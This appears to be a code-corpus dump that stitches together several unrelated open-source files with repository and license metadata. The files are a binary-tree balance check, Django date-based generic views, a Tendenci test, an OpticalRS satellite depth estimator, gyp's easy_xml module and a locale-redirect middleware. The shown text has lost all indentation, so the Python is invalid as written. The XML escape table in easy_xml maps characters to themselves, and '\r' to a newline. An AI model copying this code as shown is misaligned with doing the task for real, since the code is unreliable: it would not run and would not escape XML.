from binary_tree_prototype import BinaryTreeNode
import collections
# @include
def is_balanced_binary_tree(tree):
BalancedStatusWithHeight = collections.namedtuple(
'BalancedStatusWithHeight', ('balanced', 'height'))
# First value of the return value indicates if tree is balanced, and if
# balanced the second value of the return value is the height of tree.
def check_balanced(tree):
if not tree:
return BalancedStatusWithHeight(True, -1) # Base case.
left_result = check_balanced(tree.left)
if not left_result.balanced:
# Left subtree is not balanced.
return BalancedStatusWithHeight(False, 0)
right_result = check_balanced(tree.right)
if not right_result.balanced:
# Right subtree is not balanced.
return BalancedStatusWithHeight(False, 0)
is_balanced = abs(left_result.height - right_result.height) <= 1
height = max(left_result.height, right_result.height) + 1
return BalancedStatusWithHeight(is_balanced, height)
return check_balanced(tree).balanced
# @exclude
def main():
# balanced binary tree test
# 3
# 2 5
# 1 4 6
tree = BinaryTreeNode()
tree.left = BinaryTreeNode()
tree.left.left = BinaryTreeNode()
tree.right = BinaryTreeNode()
tree.right.left = BinaryTreeNode()
tree.right.right = BinaryTreeNode()
assert is_balanced_binary_tree(tree)
print(is_balanced_binary_tree(tree))
# Non-balanced binary tree test.
tree = BinaryTreeNode()
tree.left = BinaryTreeNode()
tree.left.left = BinaryTreeNode()
assert not is_balanced_binary_tree(tree)
print(is_balanced_binary_tree(tree))
if __name__ == '__main__':
main()
|
mit
|
tomchristie/django
|
django/views/generic/dates.py
|
4
|
25236
|
import datetime
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.http import Http404
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.translation import gettext as _
from django.views.generic.base import View
from django.views.generic.detail import (
BaseDetailView, SingleObjectTemplateResponseMixin,
)
from django.views.generic.list import (
MultipleObjectMixin, MultipleObjectTemplateResponseMixin,
)
class YearMixin:
"""Mixin for views manipulating year-based data."""
year_format = '%Y'
year = None
def get_year_format(self):
"""
Get a year format string in strptime syntax to be used to parse the
year from url variables.
"""
return self.year_format
def get_year(self):
"""Return the year for which this view should display data."""
year = self.year
if year is None:
try:
year = self.kwargs['year']
except KeyError:
try:
year = self.request.GET['year']
except KeyError:
raise Http404(_("No year specified"))
return year
def get_next_year(self, date):
"""Get the next valid year."""
return _get_next_prev(self, date, is_previous=False, period='year')
def get_previous_year(self, date):
"""Get the previous valid year."""
return _get_next_prev(self, date, is_previous=True, period='year')
def _get_next_year(self, date):
"""
Return the start date of the next interval.
The interval is defined by start date <= item date < next start date.
"""
try:
return date.replace(year=date.year + 1, month=1, day=1)
except ValueError:
raise Http404(_("Date out of range"))
def _get_current_year(self, date):
"""Return the start date of the current interval."""
return date.replace(month=1, day=1)
class MonthMixin:
"""Mixin for views manipulating month-based data."""
month_format = '%b'
month = None
def get_month_format(self):
"""
Get a month format string in strptime syntax to be used to parse the
month from url variables.
"""
return self.month_format
def get_month(self):
"""Return the month for which this view should display data."""
month = self.month
if month is None:
try:
month = self.kwargs['month']
except KeyError:
try:
month = self.request.GET['month']
except KeyError:
raise Http404(_("No month specified"))
return month
def get_next_month(self, date):
"""Get the next valid month."""
return _get_next_prev(self, date, is_previous=False, period='month')
def get_previous_month(self, date):
"""Get the previous valid month."""
return _get_next_prev(self, date, is_previous=True, period='month')
def _get_next_month(self, date):
"""
Return the start date of the next interval.
The interval is defined by start date <= item date < next start date.
"""
if date.month == 12:
try:
return date.replace(year=date.year + 1, month=1, day=1)
except ValueError:
raise Http404(_("Date out of range"))
else:
return date.replace(month=date.month + 1, day=1)
def _get_current_month(self, date):
"""Return the start date of the previous interval."""
return date.replace(day=1)
class DayMixin:
"""Mixin for views manipulating day-based data."""
day_format = '%d'
day = None
def get_day_format(self):
"""
Get a day format string in strptime syntax to be used to parse the day
from url variables.
"""
return self.day_format
def get_day(self):
"""Return the day for which this view should display data."""
day = self.day
if day is None:
try:
day = self.kwargs['day']
except KeyError:
try:
day = self.request.GET['day']
except KeyError:
raise Http404(_("No day specified"))
return day
def get_next_day(self, date):
"""Get the next valid day."""
return _get_next_prev(self, date, is_previous=False, period='day')
def get_previous_day(self, date):
"""Get the previous valid day."""
return _get_next_prev(self, date, is_previous=True, period='day')
def _get_next_day(self, date):
"""
Return the start date of the next interval.
The interval is defined by start date <= item date < next start date.
"""
return date + datetime.timedelta(days=1)
def _get_current_day(self, date):
"""Return the start date of the current interval."""
return date
class WeekMixin:
"""Mixin for views manipulating week-based data."""
week_format = '%U'
week = None
def get_week_format(self):
"""
Get a week format string in strptime syntax to be used to parse the
week from url variables.
"""
return self.week_format
def get_week(self):
"""Return the week for which this view should display data."""
week = self.week
if week is None:
try:
week = self.kwargs['week']
except KeyError:
try:
week = self.request.GET['week']
except KeyError:
raise Http404(_("No week specified"))
return week
def get_next_week(self, date):
"""Get the next valid week."""
return _get_next_prev(self, date, is_previous=False, period='week')
def get_previous_week(self, date):
"""Get the previous valid week."""
return _get_next_prev(self, date, is_previous=True, period='week')
def _get_next_week(self, date):
"""
Return the start date of the next interval.
The interval is defined by start date <= item date < next start date.
"""
try:
return date + datetime.timedelta(days=7 - self._get_weekday(date))
except OverflowError:
raise Http404(_("Date out of range"))
def _get_current_week(self, date):
"""Return the start date of the current interval."""
return date - datetime.timedelta(self._get_weekday(date))
def _get_weekday(self, date):
"""
Return the weekday for a given date.
The first day according to the week format is 0 and the last day is 6.
"""
week_format = self.get_week_format()
if week_format == '%W': # week starts on Monday
return date.weekday()
elif week_format == '%U': # week starts on Sunday
return (date.weekday() + 1) % 7
else:
raise ValueError("unknown week format: %s" % week_format)
class DateMixin:
"""Mixin class for views manipulating date-based data."""
date_field = None
allow_future = False
def get_date_field(self):
"""Get the name of the date field to be used to filter by."""
if self.date_field is None:
raise ImproperlyConfigured("%s.date_field is required." % self.__class__.__name__)
return self.date_field
def get_allow_future(self):
"""
Return `True` if the view should be allowed to display objects from
the future.
"""
return self.allow_future
# Note: the following three methods only work in subclasses that also
# inherit SingleObjectMixin or MultipleObjectMixin.
@cached_property
def uses_datetime_field(self):
"""
Return `True` if the date field is a `DateTimeField` and `False`
if it's a `DateField`.
"""
model = self.get_queryset().model if self.model is None else self.model
field = model._meta.get_field(self.get_date_field())
return isinstance(field, models.DateTimeField)
def _make_date_lookup_arg(self, value):
"""
Convert a date into a datetime when the date field is a DateTimeField.
When time zone support is enabled, `date` is assumed to be in the
current time zone, so that displayed items are consistent with the URL.
"""
if self.uses_datetime_field:
value = datetime.datetime.combine(value, datetime.time.min)
if settings.USE_TZ:
value = timezone.make_aware(value, timezone.get_current_timezone())
return value
def _make_single_date_lookup(self, date):
"""
Get the lookup kwargs for filtering on a single date.
If the date field is a DateTimeField, we can't just filter on
date_field=date because that doesn't take the time into account.
"""
date_field = self.get_date_field()
if self.uses_datetime_field:
since = self._make_date_lookup_arg(date)
until = self._make_date_lookup_arg(date + datetime.timedelta(days=1))
return {
'%s__gte' % date_field: since,
'%s__lt' % date_field: until,
}
else:
# Skip self._make_date_lookup_arg, it's a no-op in this branch.
return {date_field: date}
class BaseDateListView(MultipleObjectMixin, DateMixin, View):
"""Abstract base class for date-based views displaying a list of objects."""
allow_empty = False
date_list_period = 'year'
def get(self, request, *args, **kwargs):
self.date_list, self.object_list, extra_context = self.get_dated_items()
context = self.get_context_data(
object_list=self.object_list,
date_list=self.date_list,
**extra_context
)
return self.render_to_response(context)
def get_dated_items(self):
"""Obtain the list of dates and items."""
raise NotImplementedError('A DateView must provide an implementation of get_dated_items()')
def get_ordering(self):
"""
Return the field or fields to use for ordering the queryset; use the
date field by default.
"""
return '-%s' % self.get_date_field() if self.ordering is None else self.ordering
def get_dated_queryset(self, **lookup):
"""
Get a queryset properly filtered according to `allow_future` and any
extra lookup kwargs.
"""
qs = self.get_queryset().filter(**lookup)
date_field = self.get_date_field()
allow_future = self.get_allow_future()
allow_empty = self.get_allow_empty()
paginate_by = self.get_paginate_by(qs)
if not allow_future:
now = timezone.now() if self.uses_datetime_field else timezone_today()
qs = qs.filter(**{'%s__lte' % date_field: now})
if not allow_empty:
# When pagination is enabled, it's better to do a cheap query
# than to load the unpaginated queryset in memory.
is_empty = len(qs) == 0 if paginate_by is None else not qs.exists()
if is_empty:
raise Http404(_("No %(verbose_name_plural)s available") % {
'verbose_name_plural': qs.model._meta.verbose_name_plural,
})
return qs
def get_date_list_period(self):
"""
Get the aggregation period for the list of dates: 'year', 'month', or
'day'.
"""
return self.date_list_period
def get_date_list(self, queryset, date_type=None, ordering='ASC'):
"""
Get a date list by calling `queryset.dates/datetimes()`, checking
along the way for empty lists that aren't allowed.
"""
date_field = self.get_date_field()
allow_empty = self.get_allow_empty()
if date_type is None:
date_type = self.get_date_list_period()
if self.uses_datetime_field:
date_list = queryset.datetimes(date_field, date_type, ordering)
else:
date_list = queryset.dates(date_field, date_type, ordering)
if date_list is not None and not date_list and not allow_empty:
raise Http404(
_("No %(verbose_name_plural)s available") % {
'verbose_name_plural': queryset.model._meta.verbose_name_plural,
}
)
return date_list
class BaseArchiveIndexView(BaseDateListView):
"""
Base class for archives of date-based items. Requires a response mixin.
"""
context_object_name = 'latest'
def get_dated_items(self):
"""Return (date_list, items, extra_context) for this request."""
qs = self.get_dated_queryset()
date_list = self.get_date_list(qs, ordering='DESC')
if not date_list:
qs = qs.none()
return (date_list, qs, {})
class ArchiveIndexView(MultipleObjectTemplateResponseMixin, BaseArchiveIndexView):
"""Top-level archive of date-based items."""
template_name_suffix = '_archive'
class BaseYearArchiveView(YearMixin, BaseDateListView):
"""List of objects published in a given year."""
date_list_period = 'month'
make_object_list = False
def get_dated_items(self):
"""Return (date_list, items, extra_context) for this request."""
year = self.get_year()
date_field = self.get_date_field()
date = _date_from_string(year, self.get_year_format())
since = self._make_date_lookup_arg(date)
until = self._make_date_lookup_arg(self._get_next_year(date))
lookup_kwargs = {
'%s__gte' % date_field: since,
'%s__lt' % date_field: until,
}
qs = self.get_dated_queryset(**lookup_kwargs)
date_list = self.get_date_list(qs)
if not self.get_make_object_list():
# We need this to be a queryset since parent classes introspect it
# to find information about the model.
qs = qs.none()
return (date_list, qs, {
'year': date,
'next_year': self.get_next_year(date),
'previous_year': self.get_previous_year(date),
})
def get_make_object_list(self):
"""
Return `True` if this view should contain the full list of objects in
the given year.
"""
return self.make_object_list
class YearArchiveView(MultipleObjectTemplateResponseMixin, BaseYearArchiveView):
"""List of objects published in a given year."""
template_name_suffix = '_archive_year'
class BaseMonthArchiveView(YearMixin, MonthMixin, BaseDateListView):
"""List of objects published in a given month."""
date_list_period = 'day'
def get_dated_items(self):
"""Return (date_list, items, extra_context) for this request."""
year = self.get_year()
month = self.get_month()
date_field = self.get_date_field()
date = _date_from_string(year, self.get_year_format(),
month, self.get_month_format())
since = self._make_date_lookup_arg(date)
until = self._make_date_lookup_arg(self._get_next_month(date))
lookup_kwargs = {
'%s__gte' % date_field: since,
'%s__lt' % date_field: until,
}
qs = self.get_dated_queryset(**lookup_kwargs)
date_list = self.get_date_list(qs)
return (date_list, qs, {
'month': date,
'next_month': self.get_next_month(date),
'previous_month': self.get_previous_month(date),
})
class MonthArchiveView(MultipleObjectTemplateResponseMixin, BaseMonthArchiveView):
"""List of objects published in a given month."""
template_name_suffix = '_archive_month'
class BaseWeekArchiveView(YearMixin, WeekMixin, BaseDateListView):
"""List of objects published in a given week."""
def get_dated_items(self):
"""Return (date_list, items, extra_context) for this request."""
year = self.get_year()
week = self.get_week()
date_field = self.get_date_field()
week_format = self.get_week_format()
week_start = {
'%W': '1',
'%U': '0',
}[week_format]
date = _date_from_string(year, self.get_year_format(),
week_start, '%w',
week, week_format)
since = self._make_date_lookup_arg(date)
until = self._make_date_lookup_arg(self._get_next_week(date))
lookup_kwargs = {
'%s__gte' % date_field: since,
'%s__lt' % date_field: until,
}
qs = self.get_dated_queryset(**lookup_kwargs)
return (None, qs, {
'week': date,
'next_week': self.get_next_week(date),
'previous_week': self.get_previous_week(date),
})
class WeekArchiveView(MultipleObjectTemplateResponseMixin, BaseWeekArchiveView):
"""List of objects published in a given week."""
template_name_suffix = '_archive_week'
class BaseDayArchiveView(YearMixin, MonthMixin, DayMixin, BaseDateListView):
"""List of objects published on a given day."""
def get_dated_items(self):
"""Return (date_list, items, extra_context) for this request."""
year = self.get_year()
month = self.get_month()
day = self.get_day()
date = _date_from_string(year, self.get_year_format(),
month, self.get_month_format(),
day, self.get_day_format())
return self._get_dated_items(date)
def _get_dated_items(self, date):
"""
Do the actual heavy lifting of getting the dated items; this accepts a
date object so that TodayArchiveView can be trivial.
"""
lookup_kwargs = self._make_single_date_lookup(date)
qs = self.get_dated_queryset(**lookup_kwargs)
return (None, qs, {
'day': date,
'previous_day': self.get_previous_day(date),
'next_day': self.get_next_day(date),
'previous_month': self.get_previous_month(date),
'next_month': self.get_next_month(date)
})
class DayArchiveView(MultipleObjectTemplateResponseMixin, BaseDayArchiveView):
"""List of objects published on a given day."""
template_name_suffix = "_archive_day"
class BaseTodayArchiveView(BaseDayArchiveView):
"""List of objects published today."""
def get_dated_items(self):
"""Return (date_list, items, extra_context) for this request."""
return self._get_dated_items(datetime.date.today())
class TodayArchiveView(MultipleObjectTemplateResponseMixin, BaseTodayArchiveView):
"""List of objects published today."""
template_name_suffix = "_archive_day"
class BaseDateDetailView(YearMixin, MonthMixin, DayMixin, DateMixin, BaseDetailView):
"""
Detail view of a single object on a single date; this differs from the
standard DetailView by accepting a year/month/day in the URL.
"""
def get_object(self, queryset=None):
"""Get the object this request displays."""
year = self.get_year()
month = self.get_month()
day = self.get_day()
date = _date_from_string(year, self.get_year_format(),
month, self.get_month_format(),
day, self.get_day_format())
# Use a custom queryset if provided
qs = self.get_queryset() if queryset is None else queryset
if not self.get_allow_future() and date > datetime.date.today():
raise Http404(_(
"Future %(verbose_name_plural)s not available because "
"%(class_name)s.allow_future is False."
) % {
'verbose_name_plural': qs.model._meta.verbose_name_plural,
'class_name': self.__class__.__name__,
})
# Filter down a queryset from self.queryset using the date from the
# URL. This'll get passed as the queryset to DetailView.get_object,
# which'll handle the 404
lookup_kwargs = self._make_single_date_lookup(date)
qs = qs.filter(**lookup_kwargs)
return super().get_object(queryset=qs)
class DateDetailView(SingleObjectTemplateResponseMixin, BaseDateDetailView):
"""
Detail view of a single object on a single date; this differs from the
standard DetailView by accepting a year/month/day in the URL.
"""
template_name_suffix = '_detail'
def _date_from_string(year, year_format, month='', month_format='', day='', day_format='', delim='__'):
"""
Get a datetime.date object given a format string and a year, month, and day
(only year is mandatory). Raise a 404 for an invalid date.
"""
format = year_format + delim + month_format + delim + day_format
datestr = year + delim + month + delim + day
try:
return datetime.datetime.strptime(datestr, format).date()
except ValueError:
raise Http404(_("Invalid date string '%(datestr)s' given format '%(format)s'") % {
'datestr': datestr,
'format': format,
})
def _get_next_prev(generic_view, date, is_previous, period):
"""
Get the next or the previous valid date. The idea is to allow links on
month/day views to never be 404s by never providing a date that'll be
invalid for the given view.
This is a bit complicated since it handles different intervals of time,
hence the coupling to generic_view.
However in essence the logic comes down to:
* If allow_empty and allow_future are both true, this is easy: just
return the naive result (just the next/previous day/week/month,
regardless of object existence.)
* If allow_empty is true, allow_future is false, and the naive result
isn't in the future, then return it; otherwise return None.
* If allow_empty is false and allow_future is true, return the next
date *that contains a valid object*, even if it's in the future. If
there are no next objects, return None.
* If allow_empty is false and allow_future is false, return the next
date that contains a valid object. If that date is in the future, or
if there are no next objects, return None.
"""
date_field = generic_view.get_date_field()
allow_empty = generic_view.get_allow_empty()
allow_future = generic_view.get_allow_future()
get_current = getattr(generic_view, '_get_current_%s' % period)
get_next = getattr(generic_view, '_get_next_%s' % period)
# Bounds of the current interval
start, end = get_current(date), get_next(date)
# If allow_empty is True, the naive result will be valid
if allow_empty:
if is_previous:
result = get_current(start - datetime.timedelta(days=1))
else:
result = end
if allow_future or result <= timezone_today():
return result
else:
return None
# Otherwise, we'll need to go to the database to look for an object
# whose date_field is at least (greater than/less than) the given
# naive result
else:
# Construct a lookup and an ordering depending on whether we're doing
# a previous date or a next date lookup.
if is_previous:
lookup = {'%s__lt' % date_field: generic_view._make_date_lookup_arg(start)}
ordering = '-%s' % date_field
else:
lookup = {'%s__gte' % date_field: generic_view._make_date_lookup_arg(end)}
ordering = date_field
# Filter out objects in the future if appropriate.
if not allow_future:
# Fortunately, to match the implementation of allow_future,
# we need __lte, which doesn't conflict with __lt above.
if generic_view.uses_datetime_field:
now = timezone.now()
else:
now = timezone_today()
lookup['%s__lte' % date_field] = now
qs = generic_view.get_queryset().filter(**lookup).order_by(ordering)
# Snag the first object from the queryset; if it doesn't exist that
# means there's no next/previous link available.
try:
result = getattr(qs[0], date_field)
except IndexError:
return None
# Convert datetimes to dates in the current time zone.
if generic_view.uses_datetime_field:
if settings.USE_TZ:
result = timezone.localtime(result)
result = result.date()
# Return the first day of the period.
return get_current(result)
def timezone_today():
"""Return the current date in the current time zone."""
if settings.USE_TZ:
return timezone.localdate()
else:
return datetime.date.today()
|
bsd-3-clause
|
alirizakeles/tendenci
|
tendenci/apps/directories/tests.py
|
1
|
1387
|
"""
This file demonstrates two different styles of tests (one doctest and one
unittest). These will both pass when you run "manage.py test".
Replace these with more appropriate tests for your application.
"""
from django.test import TestCase, Client
from django.contrib.auth.models import User
from tendenci.apps.directories.models import Directory
class DirectoryTest(TestCase):
def setUp(self):
# create the objects needed
self.client = Client()
self.directory = Directory()
self.user = User(username='admin')
self.user.set_password('google')
self.user.is_active = True
self.user.save()
def tearDown(self):
self.client = None
self.directory = None
self.user = None
def test_save(self):
self.directory.headline = 'Unit Testing'
self.directory.summary = 'Unit Testing'
# required fields
self.directory.creator = self.user
self.directory.creator_username = self.user.username
self.directory.owner = self.user
self.directory.owner_username = self.user.username
self.directory.status = True
self.directory.status_detail = 'active'
self.directory.enclosure_length = 0
self.directory.timezone = 'America/Chicago'
self.directory.save()
self.assertEquals(type(self.directory.id), long)
|
gpl-3.0
|
jkibele/OpticalRS
|
OpticalRS/DepthEstimator.py
|
1
|
9986
|
# -*- coding: utf-8 -*-
"""
DepthEstimator
==============
Code for handling required data and producing depth estimates from multispectral
satellite imagery. KNN (Kibele and Shears, In Review) and linear methods
(Lyzenga et al., 2006) are currently supported.
References
----------
Kibele, J., Shears, N.T., In Press. Non-parametric empirical depth regression
for bathymetric mapping in coastal waters. IEEE Journal of Selected Topics in
Applied Earth Observations and Remote Sensing.
Lyzenga, D.R., Malinas, N.P., Tanis, F.J., 2006. Multispectral bathymetry using
a simple physically based algorithm. Geoscience and Remote Sensing, IEEE
Transactions on 44, 2251–2259. doi:10.1109/TGRS.2006.872909
"""
from RasterDS import RasterDS
from ArrayUtils import mask3D_with_2D, equalize_array_masks, equalize_band_masks
import KNNDepth
from Lyzenga2006 import dark_pixel_array, fit_and_predict, deep_water_means
import numpy as np
from sklearn.cross_validation import train_test_split
class DepthEstimator(object):
"""
Once initialized, this object can do a bunch of tasks related to depth
estimation.
Parameters
----------
img : OpticalRS.RasterDS, numpy image array, or file path to image
This is the multispectral image for which depth is to be estimated.
known_depths : OpticalRS.RasterDS, numpy image array, or file path to image
A raster of known depths.
Notes
-----
Assumptions:
- size of known_depths array = size of a single band of img
- unmasked known_depths pixels are a subset of unmasked img pixels
"""
def __init__(self,img,known_depths):
self.img_original = img
self.imrds = None
try:
self.imlevel = img.ndim
except AttributeError:
if type(img).__name__ == 'RasterDS':
self.imlevel = 4
self.imrds = img
else:
# next line should raise exception if `img` can't make RasterDS
self.imrds = RasterDS(img)
self.imlevel = 4
self.known_original = known_depths
if type(self.known_original).__name__=='RasterDS':
self.kdrds = known_depths
elif np.ma.isMaskedArray(self.known_original):
self.kdrds = None
else:
self.kdrds = RasterDS(self.known_original)
self.known_depth_arr = self.__known_depth_arr()
self.imarr = self.__imarr()
self.__mask_depths_with_no_image()
self.nbands = self.imarr_flat.shape[-1]
# Check that the numbers of pixels are compatible
impix = self.imarr_flat.size / self.nbands
dpix = self.known_depth_arr_flat.size
errstr = "{} image pixels and {} depth pixels. Need the same number of pixels."
assert impix == dpix, errstr.format(impix,dpix)
def __imarr(self):
"""
Return 3D (R,C,nBands) image array if possible. If only 2D
(pixels,nBands) array is available, return `None`. Returned array will
be np.ma.MaskedArray type even if no pixels are masked.
"""
try:
self.imarr
except AttributeError:
if self.imlevel == 4:
arr = np.ma.masked_invalid(self.imrds.band_array)
self.imarr = arr
elif self.imlevel == 3:
arr = np.ma.masked_invalid(self.img_original)
self.imarr = arr
else: # level 2
self.imarr = None
return self.imarr
def __known_depth_arr(self):
"""
Return a 2D (R,C) masked array of known depths if possible. If flat
array was handed in instead, return `None`.
"""
try:
self.known_depth_arr
except AttributeError:
if self.kdrds:
arr = self.kdrds.band_array.squeeze()
self.known_depth_arr = np.ma.masked_invalid(arr)
elif isinstance(self.known_original,np.ndarray):
arr = self.known_original.squeeze()
if arr.ndim > 1:
self.known_depth_arr = np.ma.masked_invalid(arr)
else:
self.known_depth_arr = None
else:
# I can't think of a case where we'd get here but...
self.known_depth_arr = None
return self.known_depth_arr
def __mask_depths_with_no_image(self):
"""
Mask depths that have no corresponding pixels. Only works for non-flat
arrays.
"""
if np.ma.is_masked(self.imarr) and np.ma.is_masked(self.known_depth_arr):
# I'm assuming all image bands have the same mask. ...they should.
immask = self.imarr[...,0].mask
self.known_depth_arr = np.ma.masked_where(immask, self.known_depth_arr)
@property
def known_depth_arr_flat(self):
if np.ma.isMA(self.known_depth_arr):
return self.known_depth_arr.ravel()
else:
return self.known_original
@property
def imarr_flat(self):
"""
Return all the image pixels in (pixels,bands) shape.
"""
if self.imlevel > 2:
return self.imarr.reshape(-1,self.imarr.shape[-1])
else:
return self.img_original
@property
def imarr_compressed(self):
"""
Return unmasked pixels in (pixels,bands) shape.
"""
return self.imarr_flat.compressed().reshape(-1,self.nbands)
@property
def known_imarr(self):
"""
Return 3D (R,C,nBands) image array with pixels masked where no known
depth is available. If no 3D image array is available, return `None`.
"""
if np.ma.isMA(self.imarr) and np.ma.isMA(self.known_depth_arr):
return mask3D_with_2D(self.imarr,self.known_depth_arr.mask)
else:
return None
@property
def known_imarr_flat(self):
"""
The flattend (pix,bands) image array with all pixels of unknown depth
masked.
"""
if np.ma.isMA(self.known_imarr):
return self.known_imarr.reshape(-1,self.nbands)
else:
mask1b = self.known_depth_arr_flat.mask
mask = np.repeat(np.atleast_2d(mask1b).T,self.nbands,1)
return np.ma.masked_where(mask,self.imarr_flat)
def training_split(self,train_size=0.4,random_state=0):
"""
Split your `DepthEstimator` into training and test subsets. This is a
wrapper on the scikit-learn `cross_validation.train_test_split`. More
info: http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.train_test_split.html
Parameters
----------
train_size : float, int, or None (default is 0.4)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the train split. If int,
represents the absolute number of train samples. If None, the value
is automatically set to 0.75.
random_state : int or RandomState
Pseudo-random number generator state used for random sampling.
Returns
-------
(train_DE,test_DE) : tuple of DepthEstimators
Two `DepthEstimator` objects made with compressed and flattened
arrays. Suitable for training and/or testing depth estimators but
not for producing images.
"""
im_train, im_test, dep_train, dep_test = train_test_split(
self.known_imarr_flat, self.known_depth_arr_flat,
train_size=train_size,random_state=random_state)
return DepthEstimator(im_train,dep_train),DepthEstimator(im_test,dep_test)
def knn_depth_model(self,k=5,weights='uniform',metric='minkowski',
n_jobs=4, **kwargs):
"""
Return a trained KNN depth model. See `OpticalRS.KNNDepth.train_model`
for more information. This is really just a wrapper over the
KNeighborsRegressor model in scikit-learn.
"""
return KNNDepth.train_model(self.known_imarr_flat.compressed().reshape(-1,self.nbands),
self.known_depth_arr_flat.compressed(),
k=k, weights=weights,
metric=metric, n_jobs=n_jobs, **kwargs)
def knn_depth_estimation(self,k=5,weights='uniform',
metric='minkowski',n_jobs=4, **kwargs):
"""
Train a KNN regression model with `known_depths` and corresponding
pixels from `img`. Then use that model to predict depths for all pixels
in `img`. Return a single band array of estimated depths.
"""
out = self.imarr[...,0].copy()
knnmodel = self.knn_depth_model(k=k, weights=weights,
metric=metric, n_jobs=n_jobs, **kwargs)
ests = knnmodel.predict(self.imarr_compressed)
out[~out.mask] = ests
return out
def lyzenga_depth_estimation(self, Rinf=None, bands=None, n_std=0,
n_jobs=4):
"""
This will implement the linear depth estimation method described in
Lyzenga et al. 2006. This doc string needs a bit more detail but I don't
have time right now. Check `OpticalRS.Lyzenga2006` for more detail. This
method just wraps some of the code from that module to make it easier to
run.
"""
if bands is None:
bands = self.nbands
if Rinf is None:
Rinf = deep_water_means(self.imarr[...,:bands], n_std=n_std)
X = np.ma.log(self.imarr[...,:bands] - Rinf)
X = equalize_band_masks(X)
# need to re-equalize, might have lost pixels in log transform
Xtrain, deparr = equalize_array_masks(X, self.known_depth_arr)
return fit_and_predict(Xtrain, deparr, X, n_jobs=n_jobs)
|
bsd-3-clause
|
marcusramberg/dotfiles
|
link/hammerspoon/hs/node_modules/node-gyp/gyp/pylib/gyp/easy_xml.py
|
1558
|
4945
|
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import os
def XmlToString(content, encoding='utf-8', pretty=False):
""" Writes the XML content to disk, touching the file only if it has changed.
Visual Studio files have a lot of pre-defined structures. This function makes
it easy to represent these structures as Python data structures, instead of
having to create a lot of function calls.
Each XML element of the content is represented as a list composed of:
1. The name of the element, a string,
2. The attributes of the element, a dictionary (optional), and
3+. The content of the element, if any. Strings are simple text nodes and
lists are child elements.
Example 1:
<test/>
becomes
['test']
Example 2:
<myelement a='value1' b='value2'>
<childtype>This is</childtype>
<childtype>it!</childtype>
</myelement>
becomes
['myelement', {'a':'value1', 'b':'value2'},
['childtype', 'This is'],
['childtype', 'it!'],
]
Args:
content: The structured content to be converted.
encoding: The encoding to report on the first XML line.
pretty: True if we want pretty printing with indents and new lines.
Returns:
The XML content as a string.
"""
# We create a huge list of all the elements of the file.
xml_parts = ['<?xml version="1.0" encoding="%s"?>' % encoding]
if pretty:
xml_parts.append('\n')
_ConstructContentList(xml_parts, content, pretty)
# Convert it to a string
return ''.join(xml_parts)
def _ConstructContentList(xml_parts, specification, pretty, level=0):
""" Appends the XML parts corresponding to the specification.
Args:
xml_parts: A list of XML parts to be appended to.
specification: The specification of the element. See EasyXml docs.
pretty: True if we want pretty printing with indents and new lines.
level: Indentation level.
"""
# The first item in a specification is the name of the element.
if pretty:
indentation = ' ' * level
new_line = '\n'
else:
indentation = ''
new_line = ''
name = specification[0]
if not isinstance(name, str):
raise Exception('The first item of an EasyXml specification should be '
'a string. Specification was ' + str(specification))
xml_parts.append(indentation + '<' + name)
# Optionally in second position is a dictionary of the attributes.
rest = specification[1:]
if rest and isinstance(rest[0], dict):
for at, val in sorted(rest[0].iteritems()):
xml_parts.append(' %s="%s"' % (at, _XmlEscape(val, attr=True)))
rest = rest[1:]
if rest:
xml_parts.append('>')
all_strings = reduce(lambda x, y: x and isinstance(y, str), rest, True)
multi_line = not all_strings
if multi_line and new_line:
xml_parts.append(new_line)
for child_spec in rest:
# If it's a string, append a text node.
# Otherwise recurse over that child definition
if isinstance(child_spec, str):
xml_parts.append(_XmlEscape(child_spec))
else:
_ConstructContentList(xml_parts, child_spec, pretty, level + 1)
if multi_line and indentation:
xml_parts.append(indentation)
xml_parts.append('</%s>%s' % (name, new_line))
else:
xml_parts.append('/>%s' % new_line)
def WriteXmlIfChanged(content, path, encoding='utf-8', pretty=False,
win32=False):
""" Writes the XML content to disk, touching the file only if it has changed.
Args:
content: The structured content to be written.
path: Location of the file.
encoding: The encoding to report on the first line of the XML file.
pretty: True if we want pretty printing with indents and new lines.
"""
xml_string = XmlToString(content, encoding, pretty)
if win32 and os.linesep != '\r\n':
xml_string = xml_string.replace('\n', '\r\n')
try:
xml_string = xml_string.encode(encoding)
except Exception:
xml_string = unicode(xml_string, 'latin-1').encode(encoding)
# Get the old content
try:
f = open(path, 'r')
existing = f.read()
f.close()
except:
existing = None
# It has changed, write it
if existing != xml_string:
f = open(path, 'w')
f.write(xml_string)
f.close()
_xml_escape_map = {
'"': '"',
"'": ''',
'<': '<',
'>': '>',
'&': '&',
'\n': '
',
'\r': '
',
}
_xml_escape_re = re.compile(
"(%s)" % "|".join(map(re.escape, _xml_escape_map.keys())))
def _XmlEscape(value, attr=False):
""" Escape a string for inclusion in XML."""
def replace(match):
m = match.string[match.start() : match.end()]
# don't replace single quotes in attrs
if attr and m == "'":
return m
return _xml_escape_map[m]
return _xml_escape_re.sub(replace, value)
|
mit
|
liu21st/masterfirefoxos
|
masterfirefoxos/base/middleware.py
|
2
|
2023
|
from django.conf import settings
from django.http import HttpResponseRedirect
class NonExistentLocaleRedirectionMiddleware(object):
"""Redirect to the 'en' version of a page if translation does not exist.
This middleware redirects requests to pages with locale other than
'en' to their 'en' version. The map of available locales and
documentation versions is maintained in
settings.VERSIONS_LOCALE_MAP.
If the user is authenticated, i.e. is staff, they don't get
redirected and they can view the requested page. This will be
useful to verify translations before releasing them.
"""
def process_request(self, request):
if hasattr(request, 'user') and request.user.is_authenticated():
return
if request.path.startswith('/en/'):
return
url_breakdown = request.path.split('/')
try:
version_slug = url_breakdown[2]
locale = url_breakdown[1]
except IndexError:
# Normally we would never need handle this exception
# because this middleware comes after LocaleMiddleware,
# which because it adds locale in the url it makes the
# url_breakdown to have a least 3 parts when split. But
# let's play it safe and just return if that ever happens.
return
for version, data in settings.VERSIONS_LOCALE_MAP.items():
if data.get('slug') == version_slug:
if locale not in data.get('locales'):
url_breakdown[1] = 'en'
new_path = '/'.join(url_breakdown)
params = request.GET.copy()
params['from-lang'] = locale
latest = settings.LOCALE_LATEST_VERSION.get(locale)
if latest:
params['latest-version'] = latest['name']
return HttpResponseRedirect(
'?'.join([new_path, params.urlencode()]))
